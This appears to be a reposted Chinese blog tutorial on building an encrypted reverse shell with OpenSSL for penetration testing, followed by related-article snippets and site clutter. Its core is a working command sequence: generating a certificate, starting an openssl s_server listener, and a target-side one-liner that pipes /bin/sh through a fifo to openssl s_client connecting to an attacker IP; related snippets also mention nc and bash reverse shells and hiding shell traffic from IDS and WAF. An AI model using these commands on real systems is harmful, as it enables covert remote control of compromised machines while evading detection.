openssl命令_利用OpenSSL搭建一个反弹shell

最新推荐文章于 2023-10-12 17:01:44 发布
最新推荐文章于 2023-10-12 17:01:44 发布
阅读量125 收藏
点赞数
文章标签: openssl命令

fa4debe38ee55a45fbd7238f1d2bc7be.png

渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。

准备

首先我们需要在自己的机器上生成密钥,这里用kali来演示。

root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

启动监听(渗透机器)

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

反弹shell(目标机器)

最后在目标机器,也就是你所攻破的机器,运行如下命令:

91dbc7c99196c2b686ba30ad3868c931.png 
low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场

来源:利用OpenSSL搭建一个反弹shell|NOSEC安全讯息平台 - NOSEC.ORG

原文:https://medium.com/@int0x33/day-43-reverse-shell-with-openssl-1ee2574aa998

白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

weixin_39705069
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell openssl_OpenSSL Shell命令教程与示例
cunjiu9486的博客
10-08 1311
shell opensslOpenSSL is free security protocols and implementation library provided by Free Software community. OpenSSL libraries are used by a lot of enterprises in their systems and products. OpenSS...
openssl的使用方法(使用openssl生成csr文件和私钥key文件)
powervip的博客
08-30 3578
使用openssl生成csr文件和私钥key文件
使用OpenSSL反弹shell
最新发布
mirocky的博客
10-12 505
使用openssl进行反弹shell的过程
Openssl反弹加密shell
干铮的博客
03-14 892
使用Openssl反弹加密shell 进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。 使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。 ...
红队隧道加密之OpenSSL加密反弹Shell(一)
xf555er的博客
11-26 983
OpenSSL一个开源的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上其主要库是以C语言所写成,实现了基本的加密功能,实现了SSL与TLS协议。OpenSSL 可以运行在OpenVMS、 Microsoft Windows以及绝大多数类Unix操作系统上(包括Solaris,Linux,Mac OS X与各种版本的开放源代码BSD操作系统)。它也提供了一个移植版本,可以在IBM i(OS/400)上运作。
利用OpenSSL搭建一个反弹shell
loon208的博客
04-01 596
渗透测试时有很多方法可以获得一个反弹shell,例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用Openssl来获得一个反弹shell。是的,就是那个几乎每个https都要使用的库,我们先用openssl来生成密钥,最后再使用它来获取一个反弹shell。 准备 首先我们需要在自己的机器上生成密钥,这里用kali来演示。 root@kali#...
ssl-server.zip_JSON_openssl server_openssl web_openssl windows_s
09-24
标题中的“ssl-server.zip_JSON_openssl server_openssl web_openssl windows_s”暗示了这是一个关于使用OpenSSL库创建简单SSL(Secure Sockets Layer)Web服务器的项目,且可能包含JSON格式的数据处理。OpenSSL是一...
windows-openssl.zip_OPENSSL 库_openssl windows_openssl开发库_openssl
09-19
在标签中,我们看到 "openssl_库"、"openssl_windows" 和 "openssl开发库",这表明这个压缩包特别适用于 Windows 开发者,他们可以利用这些资源进行 OpenSSL 的集成和开发工作。"openssl测试" 指的是可能包含的测试...
tls.rar_TLS_openssl TLS_openssl server_openssl t
09-24
在标签中,“openssl_tls”、“openssl_server”和“openssl_t”进一步强调了这些源代码与OpenSSL库中的TLS功能有关,特别是关于服务器端的部分。这可能包括OpenSSL库的使用,如设置TLS版本、选择加密套件、处理证书...
cli.rar_Openssl socket_openssl ssl_socket ssl_ssl
09-20
在IT行业中,网络通信是至关重要的一个领域,而OpenSSL库则是实现安全网络通信的基石。本主题聚焦于“使用openssl的SSL下的SOCKET客户端”,将深入探讨如何使用OpenSSL库来建立一个基于SSL/TLS协议的安全SOCKET连接...
openssl-OpenSSL_1_1_1d.tar.gz
10-19
它遵循了通常的命名规范,其中 "openssl" 表示这是一个OpenSSL 相关的软件,"OpenSSL_1_1_1d" 指的是 OpenSSL 的特定版本号,即 1.1.1d,".tar.gz" 则表示这是一个使用 tar 命令打包并用 gzip 进行压缩的文件。...
利用OpenSSL加密反弹shell流量
The current road is different, love needs to distinguish between right and wrong
02-15 3220
简介 在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。 实验环境 kali:192.168.95.128 centos:192.168.95.147 Wireshark抓包 在kali上使用nc监听一个端口 nc -lvvp 4444 将centos的shell反弹过去 bash -i
openssl命令_使用OpenSsl加密反弹shell
weixin_39713538的博客
11-24 334
一、实际环境:当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shellOpenSSL ...
通过shell使用openssl生成证书
qq_37172890的博客
04-02 1123
calm heart证书说明环境说明shell脚本openssl.cnf配置lighttpd.conf配置其他说明Finally 证书说明 CA可视为密码学中的认证中心,本文通过自建的ca根证书(浏览器为不安全,需要信任),签名申请证书。(可申请不同证书用于不同端口或域名,共用同一个CA) 环境说明 openwrt openssl lighttpd shell脚本 #!/bin/bash #@d...
OpenSSL常用命令
bytxl的专栏
01-28 2123
http://myswirl.blog.163.com/blog/static/5131864220071014102353799/ 加密算法: 对称加密算法: DES、IDEA、RC2、RC4、AES、Skipjack …… 非对称加密算法: RSA、DSA、DiffieHellman、PKCS、PGP …… 单向的HASH算法属于报文摘要算法,虽然有些也出自OpenSSL库。
Linux服务篇--SSL
天空飘过的鱼的博客
04-08 5970
本章概要 安全机制 对称和非对称加密 散列算法 gpg PKI和CA openssl 证书管理 ssh服务和dropbear aide Sudo TCP Wrappers PAM模块 1、数据安全与加密算法 1.1 数据加密 安全机制 信息安全防护的目标 保密性 Confidentiality 完整性 Integrity 可用性 Usability 可控制性 Controlability ...
关于rsa的openssl命令一些随笔。
郁离歌丶的博客
02-23 2328
openssl用来对一些标准格式的rsa加解密。首先对于pubkey.pem,我们可以使用openssl命令提取信息。openssl rsa -pubin -in (文件名) -textps:只要文件名合法就能提取相关信息。而对于private.pem,我们也可以使用openssl命令openssl rsa -in (文件名) -text然后我们来介绍一下openssl 的rsautl:加解密1...
OpenSSL命令---s_client
weixin_34408717的博客
07-29 235
用途:s_client为一个SSL/TLS客户端程序,与s_server对应,它不仅能与s_server进行通信,也能与任何使用ssl协议的其他服务程序进行通信。用法:[cpp] view plain copyopenssl s_client [-host host] [-port port] [-connect host:port] [-verify depth] [-cert filename...
深入解析openssl命令与应用
"这篇资源是一份关于openssl命令详解的系列文章,作者在BBS水木清华站上分享了自己对openssl工具的理解和使用经验,包括openssl的证书、加密算法、协议、入门指南以及一些具体指令如verify、asn1parse、ca、cipher和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值